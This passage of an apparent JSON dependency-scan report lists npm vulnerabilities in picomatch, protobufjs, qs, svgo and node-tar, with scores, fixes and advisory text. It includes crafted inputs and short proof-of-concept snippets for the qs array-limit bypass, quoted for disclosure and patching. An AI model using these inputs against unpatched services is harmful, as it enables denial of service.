], "PkgID": "picomatch@2.3.1", "PkgName": "picomatch", "PkgIdentifier": { "PURL": "pkg:npm/picomatch@2.3.1", "UID": "4893c2a2be9c6269" }, "InstalledVersion": "2.3.1", "FixedVersion": "4.0.4, 3.0.2, 2.3.2", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-33671", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:af7dde4672a5df977f78fb0d1dace6f9fa229b225fdf977f76971283e1354a1a", "Title": "picomatch: Picomatch: Regular Expression Denial of Service via crafted extglob patterns", "Description": "Picomatch is a glob matcher written JavaScript. Versions prior to 4.0.4, 3.0.2, and 2.3.2 are vulnerable to Regular Expression Denial of Service (ReDoS) when processing crafted extglob patterns. Certain patterns using extglob quantifiers such as `+()` and `*()`, especially when combined with overlapping alternatives or nested extglobs, are compiled into regular expressions that can exhibit catastrophic backtracking on non-matching input. Applications are impacted when they allow untrusted users to supply glob patterns that are passed to `picomatch` for compilation or matching. In those cases, an attacker can cause excessive CPU consumption and block the Node.js event loop, resulting in a denial of service. Applications that only use trusted, developer-controlled glob patterns are much less likely to be exposed in a security-relevant way. This issue is fixed in picomatch 4.0.4, 3.0.2 and 2.3.2. Users should upgrade to one of these versions or later, depending on their supported release line. If upgrading is not immediately possible, avoid passing untrusted glob patterns to `picomatch`. Possible mitigations include disabling extglob support for untrusted patterns by using `noextglob: true`, rejecting or sanitizing patterns containing nested extglobs or extglob quantifiers such as `+()` and `*()`, enforcing strict allowlists for accepted pattern syntax, running matching in an isolated worker or separate process with time and resource limits, and applying application-level request throttling and input validation for any endpoint that accepts glob patterns.", "Severity": "HIGH", "CweIDs": [ "CWE-1333" ], "VendorSeverity": { "azure": 3, "ghsa": 3, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "V3Score": 6.5 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-33671", "https://github.com/micromatch/picomatch", "https://github.com/micromatch/picomatch/commit/5eceecd27543b8e056b9307d69e105ea03618a7d", "https://github.com/micromatch/picomatch/security/advisories/GHSA-c2c7-rcm5-vvqj", "https://nvd.nist.gov/vuln/detail/CVE-2026-33671", "https://www.cve.org/CVERecord?id=CVE-2026-33671" ], "PublishedDate": "2026-03-26T22:16:30.21Z", "LastModifiedDate": "2026-04-01T13:45:11.687Z" }, { "VulnerabilityID": "CVE-2026-33672", "VendorIDs": [ "GHSA-3v7f-55p6-f55p" ], "PkgID": "picomatch@2.3.1", "PkgName": "picomatch", "PkgIdentifier": { "PURL": "pkg:npm/picomatch@2.3.1", "UID": "4893c2a2be9c6269" }, "InstalledVersion": "2.3.1", "FixedVersion": "4.0.4, 3.0.2, 2.3.2", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-33672", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:0fe83f1aa0027b6addbe7540b3a682baa479d2b617ca6d0e89d985d83684f6d3", "Title": "picomatch: Picomatch: Data integrity compromised via method injection with crafted POSIX bracket expressions", "Description": "Picomatch is a glob matcher written JavaScript. Versions prior to 4.0.4, 3.0.2, and 2.3.2 are vulnerable to a method injection vulnerability affecting the `POSIX_REGEX_SOURCE` object. Because the object inherits from `Object.prototype`, specially crafted POSIX bracket expressions (e.g., `[[:constructor:]]`) can reference inherited method names. These methods are implicitly converted to strings and injected into the generated regular expression. This leads to incorrect glob matching behavior (integrity impact), where patterns may match unintended filenames. The issue does not enable remote code execution, but it can cause security-relevant logic errors in applications that rely on glob matching for filtering, validation, or access control. All users of affected `picomatch` versions that process untrusted or user-controlled glob patterns are potentially impacted. This issue is fixed in picomatch 4.0.4, 3.0.2 and 2.3.2. Users should upgrade to one of these versions or later, depending on their supported release line. If upgrading is not immediately possible, avoid passing untrusted glob patterns to picomatch. Possible mitigations include sanitizing or rejecting untrusted glob patterns, especially those containing POSIX character classes like `[[:...:]]`; avoiding the use of POSIX bracket expressions if user input is involved; and manually patching the library by modifying `POSIX_REGEX_SOURCE` to use a null prototype.", "Severity": "MEDIUM", "CweIDs": [ "CWE-1321" ], "VendorSeverity": { "azure": 2, "ghsa": 2, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "V3Score": 5.3 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "V3Score": 5.3 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-33672", "https://github.com/micromatch/picomatch", "https://github.com/micromatch/picomatch/commit/4516eb521f13a46b2fe1a1d2c9ef6b20ddc0e903", "https://github.com/micromatch/picomatch/security/advisories/GHSA-3v7f-55p6-f55p", "https://nvd.nist.gov/vuln/detail/CVE-2026-33672", "https://www.cve.org/CVERecord?id=CVE-2026-33672" ], "PublishedDate": "2026-03-26T22:16:30.387Z", "LastModifiedDate": "2026-04-01T13:44:53.397Z" }, { "VulnerabilityID": "CVE-2026-33671", "VendorIDs": [ "GHSA-c2c7-rcm5-vvqj" ], "PkgID": "picomatch@4.0.3", "PkgName": "picomatch", "PkgIdentifier": { "PURL": "pkg:npm/picomatch@4.0.3", "UID": "ebc01f786eb09b8f" }, "InstalledVersion": "4.0.3", "FixedVersion": "4.0.4, 3.0.2, 2.3.2", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-33671", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:3ea42892a375bd5afbfc2830489cf8926777d14170cef38584d1ef17f76bf674", "Title": "picomatch: Picomatch: Regular Expression Denial of Service via crafted extglob patterns", "Description": "Picomatch is a glob matcher written JavaScript. Versions prior to 4.0.4, 3.0.2, and 2.3.2 are vulnerable to Regular Expression Denial of Service (ReDoS) when processing crafted extglob patterns. Certain patterns using extglob quantifiers such as `+()` and `*()`, especially when combined with overlapping alternatives or nested extglobs, are compiled into regular expressions that can exhibit catastrophic backtracking on non-matching input. Applications are impacted when they allow untrusted users to supply glob patterns that are passed to `picomatch` for compilation or matching. In those cases, an attacker can cause excessive CPU consumption and block the Node.js event loop, resulting in a denial of service. Applications that only use trusted, developer-controlled glob patterns are much less likely to be exposed in a security-relevant way. This issue is fixed in picomatch 4.0.4, 3.0.2 and 2.3.2. Users should upgrade to one of these versions or later, depending on their supported release line. If upgrading is not immediately possible, avoid passing untrusted glob patterns to `picomatch`. Possible mitigations include disabling extglob support for untrusted patterns by using `noextglob: true`, rejecting or sanitizing patterns containing nested extglobs or extglob quantifiers such as `+()` and `*()`, enforcing strict allowlists for accepted pattern syntax, running matching in an isolated worker or separate process with time and resource limits, and applying application-level request throttling and input validation for any endpoint that accepts glob patterns.", "Severity": "HIGH", "CweIDs": [ "CWE-1333" ], "VendorSeverity": { "azure": 3, "ghsa": 3, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "V3Score": 6.5 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-33671", "https://github.com/micromatch/picomatch", "https://github.com/micromatch/picomatch/commit/5eceecd27543b8e056b9307d69e105ea03618a7d", "https://github.com/micromatch/picomatch/security/advisories/GHSA-c2c7-rcm5-vvqj", "https://nvd.nist.gov/vuln/detail/CVE-2026-33671", "https://www.cve.org/CVERecord?id=CVE-2026-33671" ], "PublishedDate": "2026-03-26T22:16:30.21Z", "LastModifiedDate": "2026-04-01T13:45:11.687Z" }, { "VulnerabilityID": "CVE-2026-33672", "VendorIDs": [ "GHSA-3v7f-55p6-f55p" ], "PkgID": "picomatch@4.0.3", "PkgName": "picomatch", "PkgIdentifier": { "PURL": "pkg:npm/picomatch@4.0.3", "UID": "ebc01f786eb09b8f" }, "InstalledVersion": "4.0.3", "FixedVersion": "4.0.4, 3.0.2, 2.3.2", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-33672", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:acc897aab8fc23f86fa5ac80fbbeed4511d454b170806959781ed43495a0576d", "Title": "picomatch: Picomatch: Data integrity compromised via method injection with crafted POSIX bracket expressions", "Description": "Picomatch is a glob matcher written JavaScript. Versions prior to 4.0.4, 3.0.2, and 2.3.2 are vulnerable to a method injection vulnerability affecting the `POSIX_REGEX_SOURCE` object. Because the object inherits from `Object.prototype`, specially crafted POSIX bracket expressions (e.g., `[[:constructor:]]`) can reference inherited method names. These methods are implicitly converted to strings and injected into the generated regular expression. This leads to incorrect glob matching behavior (integrity impact), where patterns may match unintended filenames. The issue does not enable remote code execution, but it can cause security-relevant logic errors in applications that rely on glob matching for filtering, validation, or access control. All users of affected `picomatch` versions that process untrusted or user-controlled glob patterns are potentially impacted. This issue is fixed in picomatch 4.0.4, 3.0.2 and 2.3.2. Users should upgrade to one of these versions or later, depending on their supported release line. If upgrading is not immediately possible, avoid passing untrusted glob patterns to picomatch. Possible mitigations include sanitizing or rejecting untrusted glob patterns, especially those containing POSIX character classes like `[[:...:]]`; avoiding the use of POSIX bracket expressions if user input is involved; and manually patching the library by modifying `POSIX_REGEX_SOURCE` to use a null prototype.", "Severity": "MEDIUM", "CweIDs": [ "CWE-1321" ], "VendorSeverity": { "azure": 2, "ghsa": 2, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "V3Score": 5.3 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "V3Score": 5.3 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-33672", "https://github.com/micromatch/picomatch", "https://github.com/micromatch/picomatch/commit/4516eb521f13a46b2fe1a1d2c9ef6b20ddc0e903", "https://github.com/micromatch/picomatch/security/advisories/GHSA-3v7f-55p6-f55p", "https://nvd.nist.gov/vuln/detail/CVE-2026-33672", "https://www.cve.org/CVERecord?id=CVE-2026-33672" ], "PublishedDate": "2026-03-26T22:16:30.387Z", "LastModifiedDate": "2026-04-01T13:44:53.397Z" }, { "VulnerabilityID": "CVE-2026-41242", "VendorIDs": [ "GHSA-xq3m-2v4x-88gg" ], "PkgID": "protobufjs@7.5.4", "PkgName": "protobufjs", "PkgIdentifier": { "PURL": "pkg:npm/protobufjs@7.5.4", "UID": "c51ca229eeb0566c" }, "InstalledVersion": "7.5.4", "FixedVersion": "8.0.1, 7.5.5", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-41242", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:52c188faaf2795a229bcea81b6335cc125a1d9b428c73fd4a7e3e11fd5ebb2ca", "Title": "Arbitrary code execution in protobufjs", "Description": "protobufjs compiles protobuf definitions into JavaScript (JS) functions. In versions prior to 8.0.1 and 7.5.5, attackers can inject arbitrary code in the \"type\" fields of protobuf definitions, which will then execute during object decoding using that definition. Versions 8.0.1 and 7.5.5 patch the issue.", "Severity": "CRITICAL", "CweIDs": [ "CWE-94" ], "VendorSeverity": { "ghsa": 4, "nvd": 4 }, "CVSS": { "ghsa": { "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H", "V40Score": 9.4 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "V3Score": 9.8 } }, "References": [ "https://github.com/protobufjs/protobuf.js", "https://github.com/protobufjs/protobuf.js/commit/535df444ac060243722ac5d672db205e5c531d75", "https://github.com/protobufjs/protobuf.js/commit/ff7b2afef8754837cc6dc64c864cd111ab477956", "https://github.com/protobufjs/protobuf.js/releases/tag/protobufjs-v7.5.5", "https://github.com/protobufjs/protobuf.js/releases/tag/protobufjs-v8.0.1", "https://github.com/protobufjs/protobuf.js/security/advisories/GHSA-xq3m-2v4x-88gg" ], "PublishedDate": "2026-04-18T17:16:13.983Z", "LastModifiedDate": "2026-04-23T15:26:37.2Z" }, { "VulnerabilityID": "CVE-2025-15284", "VendorIDs": [ "GHSA-6rw7-vpxm-498p" ], "PkgID": "qs@6.13.0", "PkgName": "qs", "PkgIdentifier": { "PURL": "pkg:npm/qs@6.13.0", "UID": "ee24446d330a5e73" }, "InstalledVersion": "6.13.0", "FixedVersion": "6.14.1", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-15284", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:6943972ba0936e8a4587243f7bf2ae5ed1b6597f47a81e715d8530262f5987f1", "Title": "qs: qs: Denial of Service via improper input validation in array parsing", "Description": "Improper Input Validation vulnerability in qs (parse modules) allows HTTP DoS.This issue affects qs: \u003c 6.14.1.\n\n\nSummary\n\nThe arrayLimit option in qs did not enforce limits for bracket notation (a[]=1\u0026a[]=2), only for indexed notation (a[0]=1). This is a consistency bug; arrayLimit should apply uniformly across all array notations.\n\nNote: The default parameterLimit of 1000 effectively mitigates the DoS scenario originally described. With default options, bracket notation cannot produce arrays larger than parameterLimit regardless of arrayLimit, because each a[]=valueconsumes one parameter slot. The severity has been reduced accordingly.\n\nDetails\n\nThe arrayLimit option only checked limits for indexed notation (a[0]=1\u0026a[1]=2) but did not enforce it for bracket notation (a[]=1\u0026a[]=2).\n\nVulnerable code (lib/parse.js:159-162):\n\nif (root === '[]' \u0026\u0026 options.parseArrays) {\n obj = utils.combine([], leaf); // No arrayLimit check\n}\n\n\n\n\n\nWorking code (lib/parse.js:175):\n\nelse if (index \u003c= options.arrayLimit) { // Limit checked here\n obj = [];\n obj[index] = leaf;\n}\n\n\n\n\n\nThe bracket notation handler at line 159 uses utils.combine([], leaf) without validating against options.arrayLimit, while indexed notation at line 175 checks index \u003c= options.arrayLimit before creating arrays.\n\n\n\nPoC\n\nconst qs = require('qs');\nconst result = qs.parse('a[]=1\u0026a[]=2\u0026a[]=3\u0026a[]=4\u0026a[]=5\u0026a[]=6', { arrayLimit: 5 });\nconsole.log(result.a.length); // Output: 6 (should be max 5)\n\n\n\n\n\nNote on parameterLimit interaction: The original advisory's \"DoS demonstration\" claimed a length of 10,000, but parameterLimit (default: 1000) caps parsing to 1,000 parameters. With default options, the actual output is 1,000, not 10,000.\n\nImpact\n\nConsistency bug in arrayLimit enforcement. With default parameterLimit, the practical DoS risk is negligible since parameterLimit already caps the total number of parsed parameters (and thus array elements from bracket notation). The risk increases only when parameterLimit is explicitly set to a very high value.", "Severity": "MEDIUM", "CweIDs": [ "CWE-20" ], "VendorSeverity": { "ghsa": 2, "redhat": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L", "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:L", "V3Score": 3.7, "V40Score": 6.3 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2025-15284", "https://github.com/ljharb/qs", "https://github.com/ljharb/qs/commit/3086902ecf7f088d0d1803887643ac6c03d415b9", "https://github.com/ljharb/qs/security/advisories/GHSA-6rw7-vpxm-498p", "https://nvd.nist.gov/vuln/detail/CVE-2025-15284", "https://www.cve.org/CVERecord?id=CVE-2025-15284" ], "PublishedDate": "2025-12-29T23:15:42.703Z", "LastModifiedDate": "2026-02-26T19:57:11.663Z" }, { "VulnerabilityID": "CVE-2026-2391", "VendorIDs": [ "GHSA-w7fw-mjwx-w883" ], "PkgID": "qs@6.13.0", "PkgName": "qs", "PkgIdentifier": { "PURL": "pkg:npm/qs@6.13.0", "UID": "ee24446d330a5e73" }, "InstalledVersion": "6.13.0", "FixedVersion": "6.14.2", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-2391", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:0575f71b068f35edc0acc2045b3f1aee53371ab217dcf2a2e315bfc9cea3fe6a", "Title": "qs: qs's arrayLimit bypass in comma parsing allows denial of service", "Description": "### Summary\nThe `arrayLimit` option in qs does not enforce limits for comma-separated values when `comma: true` is enabled, allowing attackers to cause denial-of-service via memory exhaustion. This is a bypass of the array limit enforcement, similar to the bracket notation bypass addressed in GHSA-6rw7-vpxm-498p (CVE-2025-15284).\n\n### Details\nWhen the `comma` option is set to `true` (not the default, but configurable in applications), qs allows parsing comma-separated strings as arrays (e.g., `?param=a,b,c` becomes `['a', 'b', 'c']`). However, the limit check for `arrayLimit` (default: 20) and the optional throwOnLimitExceeded occur after the comma-handling logic in `parseArrayValue`, enabling a bypass. This permits creation of arbitrarily large arrays from a single parameter, leading to excessive memory allocation.\n\n**Vulnerable code** (lib/parse.js: lines ~40-50):\n```js\nif (val \u0026\u0026 typeof val === 'string' \u0026\u0026 options.comma \u0026\u0026 val.indexOf(',') \u003e -1) {\n    return val.split(',');\n}\n\nif (options.throwOnLimitExceeded \u0026\u0026 currentArrayLength \u003e= options.arrayLimit) {\n    throw new RangeError('Array limit exceeded. Only ' + options.arrayLimit + ' element' + (options.arrayLimit === 1 ? '' : 's') + ' allowed in an array.');\n}\n\nreturn val;\n```\nThe `split(',')` returns the array immediately, skipping the subsequent limit check. Downstream merging via `utils.combine` does not prevent allocation, even if it marks overflows for sparse arrays.This discrepancy allows attackers to send a single parameter with millions of commas (e.g., `?param=,,,,,,,,...`), allocating massive arrays in memory without triggering limits. It bypasses the intent of `arrayLimit`, which is enforced correctly for indexed (`a[0]=`) and bracket (`a[]=`) notations (the latter fixed in v6.14.1 per GHSA-6rw7-vpxm-498p).\n\n### PoC\n**Test 1 - Basic bypass:**\n```\nnpm install qs\n```\n\n```js\nconst qs = require('qs');\n\nconst payload = 'a=' + ','.repeat(25); // 26 elements after split (bypasses arrayLimit: 5)\nconst options = { comma: true, arrayLimit: 5, throwOnLimitExceeded: true };\n\ntry {\n  const result = qs.parse(payload, options);\n  console.log(result.a.length); // Outputs: 26 (bypass successful)\n} catch (e) {\n  console.log('Limit enforced:', e.message); // Not thrown\n}\n```\n**Configuration:**\n- `comma: true`\n- `arrayLimit: 5`\n- `throwOnLimitExceeded: true`\n\nExpected: Throws \"Array limit exceeded\" error.\nActual: Parses successfully, creating an array of length 26.\n\n\n### Impact\nDenial of Service (DoS) via memory exhaustion.", "Severity": "LOW", "CweIDs": [ "CWE-20" ], "VendorSeverity": { "ghsa": 1, "nvd": 3, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L", "V3Score": 3.7 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "V3Score": 5.3 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-2391", "https://github.com/ljharb/qs", "https://github.com/ljharb/qs/commit/f6a7abff1f13d644db9b05fe4f2c98ada6bf8482", "https://github.com/ljharb/qs/security/advisories/GHSA-w7fw-mjwx-w883", "https://nvd.nist.gov/vuln/detail/CVE-2026-2391", "https://www.cve.org/CVERecord?id=CVE-2026-2391" ], "PublishedDate": "2026-02-12T05:17:11.187Z", "LastModifiedDate": "2026-02-24T20:13:51.837Z" }, { "VulnerabilityID": "CVE-2026-29074", "VendorIDs": [ "GHSA-xpqw-6gx7-v673" ], "PkgID": "svgo@3.3.2", "PkgName": "svgo", "PkgIdentifier": { "PURL": "pkg:npm/svgo@3.3.2", "UID": "799b27abaf83d459" }, "InstalledVersion": "3.3.2", "FixedVersion": "2.8.1, 3.3.3, 4.0.1", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-29074", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:0c40bfa10908984313e661a8adb2b4ffb75795a776dd82c617123d85dd0fa194", "Title": "svgo: SVGO: Denial of Service via XML entity expansion", "Description": "SVGO, short for SVG Optimizer, is a Node.js library and command-line application for optimizing SVG files. From version 2.1.0 to before version 2.8.1, from version 3.0.0 to before version 3.3.3, and before version 4.0.1, SVGO accepts XML with custom entities, without guards against entity expansion or recursion. This can result in a small XML file (811 bytes) stalling the application and even crashing the Node.js process with JavaScript heap out of memory. This issue has been patched in versions 2.8.1, 3.3.3, and 4.0.1.", "Severity": "HIGH", "CweIDs": [ "CWE-776" ], "VendorSeverity": { "ghsa": 3, "redhat": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-29074", "https://github.com/svg/svgo", "https://github.com/svg/svgo/security/advisories/GHSA-xpqw-6gx7-v673", "https://nvd.nist.gov/vuln/detail/CVE-2026-29074", "https://www.cve.org/CVERecord?id=CVE-2026-29074" ], "PublishedDate": "2026-03-06T08:16:26.92Z", "LastModifiedDate": "2026-03-10T19:02:54.257Z" }, { "VulnerabilityID": "CVE-2026-23745", "VendorIDs": [ "GHSA-8qq5-rm4j-mr97" ], "PkgID": "tar@6.2.1", "PkgName": "tar", "PkgIdentifier": { "PURL": "pkg:npm/tar@6.2.1", "UID": "769cdab53da6940b" }, "InstalledVersion": "6.2.1", "FixedVersion": "7.5.3", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-23745", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:08d8b4a5db502ee5fd9a40233dbf966ecb6e1061cb22c90d87e097838a08c39c", "Title": "node-tar: tar: node-tar: Arbitrary file overwrite and symlink poisoning via unsanitized linkpaths in archives", "Description": "node-tar is a Tar for Node.js. The node-tar library (\u003c= 7.5.2) fails to sanitize the linkpath of Link (hardlink) and SymbolicLink entries when preservePaths is false (the default secure behavior). This allows malicious archives to bypass the extraction root restriction, leading to Arbitrary File Overwrite via hardlinks and Symlink Poisoning via absolute symlink targets. This vulnerability is fixed in 7.5.3.", "Severity": "HIGH", "CweIDs": [ "CWE-22" ], "VendorSeverity": { "amazon": 3, "ghsa": 3, "nvd": 2, "redhat": 3 }, "CVSS": { "ghsa": { "V40Vector": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:L/VA:N/SC:H/SI:L/SA:N", "V40Score": 8.2 }, "nvd": { "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N", "V3Score": 6.1 }, "redhat": { "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", "V3Score": 8.2 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-23745", "https://github.com/isaacs/node-tar", "https://github.com/isaacs/node-tar/commit/340eb285b6d986e91969a1170d7fe9b0face405e", "https://github.com/isaacs/node-tar/security/advisories/GHSA-8qq5-rm4j-mr97", "https://nvd.nist.gov/vuln/detail/CVE-2026-23745", "https://www.cve.org/CVERecord?id=CVE-2026-23745" ], "PublishedDate": "2026-01-16T22:16:26.83Z", "LastModifiedDate": "2026-02-18T16:20:07.823Z" }, { "VulnerabilityID": "CVE-2026-23950", "VendorIDs": [ "GHSA-r6q2-hw4h-h46w" ], "PkgID": "tar@6.2.1", "PkgName": "tar", "PkgIdentifier": { "PURL": "pkg:npm/tar@6.2.1", "UID": "769cdab53da6940b" }, "InstalledVersion": "6.2.1", "FixedVersion": "7.5.4", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-23950", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:1a6dca275f9b61fbf64970298743723ac9f8c83b76fc89dbeea6e93b56f41e0b", "Title": "node-tar: tar: node-tar: Arbitrary file overwrite via Unicode path collision race condition", "Description": "node-tar,a Tar for Node.js, has a race condition vulnerability in versions up to and including 7.5.3. This is due to an incomplete handling of Unicode path collisions in the `path-reservations` system. On case-insensitive or normalization-insensitive filesystems (such as macOS APFS, In which it has been tested), the library fails to lock colliding paths (e.g., `ß` and `ss`), allowing them to be processed in parallel. This bypasses the library's internal concurrency safeguards and permits Symlink Poisoning attacks via race conditions. The library uses a `PathReservations` system to ensure that metadata checks and file operations for the same path are serialized. This prevents race conditions where one entry might clobber another concurrently. This is a Race Condition which enables Arbitrary File Overwrite. This vulnerability affects users and systems using node-tar on macOS (APFS/HFS+). Because of using `NFD` Unicode normalization (in which `ß` and `ss` are different), conflicting paths do not have their order properly preserved under filesystems that ignore Unicode normalization (e.g., APFS (in which `ß` causes an inode collision with `ss`)). This enables an attacker to circumvent internal parallelization locks (`PathReservations`) using conflicting filenames within a malicious tar archive. The patch in version 7.5.4 updates `path-reservations.js` to use a normalization form that matches the target filesystem's behavior (e.g., `NFKD`), followed by first `toLocaleLowerCase('en')` and then `toLocaleUpperCase('en')`. As a workaround, users who cannot upgrade promptly, and who are programmatically using `node-tar` to extract arbitrary tarball data should filter out all `SymbolicLink` entries (as npm does) to defend against arbitrary file writes via this file system entry name collision issue.", "Severity": "HIGH", "CweIDs": [ "CWE-176", "CWE-352", "CWE-367" ], "VendorSeverity": { "amazon": 3, "ghsa": 3, "nvd": 2, "redhat": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L", "V3Score": 8.8 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N", "V3Score": 5.9 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L", "V3Score": 8.8 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-23950", "https://github.com/isaacs/node-tar", "https://github.com/isaacs/node-tar/commit/3b1abfae650056edfabcbe0a0df5954d390521e6", "https://github.com/isaacs/node-tar/security/advisories/GHSA-r6q2-hw4h-h46w", "https://nvd.nist.gov/vuln/detail/CVE-2026-23950", "https://www.cve.org/CVERecord?id=CVE-2026-23950" ], "PublishedDate": "2026-01-20T01:15:57.87Z", "LastModifiedDate": "2026-02-18T15:50:29.91Z" }, { "VulnerabilityID": "CVE-2026-24842", "VendorIDs": [ "GHSA-34x7-hfp2-rc4v" ], "PkgID": "tar@6.2.1", "PkgName": "tar", "PkgIdentifier": { "PURL": "pkg:npm/tar@6.2.1", "UID": "769cdab53da6940b" }, "InstalledVersion": "6.2.1", "FixedVersion": "7.5.7", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-24842", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:661fb4dbeb0451bf3364a9fdf1d85d7b5b25fd295fdb6a0dc0e82386dd0178b5", "Title": "node-tar: tar: node-tar: Arbitrary file creation via path traversal bypass in hardlink security check", "Description": "node-tar,a Tar for Node.js, contains a vulnerability in versions prior to 7.5.7 where the security check for hardlink entries uses different path resolution semantics than the actual hardlink creation logic. This mismatch allows an attacker to craft a malicious TAR archive that bypasses path traversal protections and creates hardlinks to arbitrary files outside the extraction directory. Version 7.5.7 contains a fix for the issue.", "Severity": "HIGH", "CweIDs": [ "CWE-22", "CWE-59" ], "VendorSeverity": { "amazon": 3, "ghsa": 3, "redhat": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N", "V3Score": 8.2 }, "redhat": { "V3Vector": 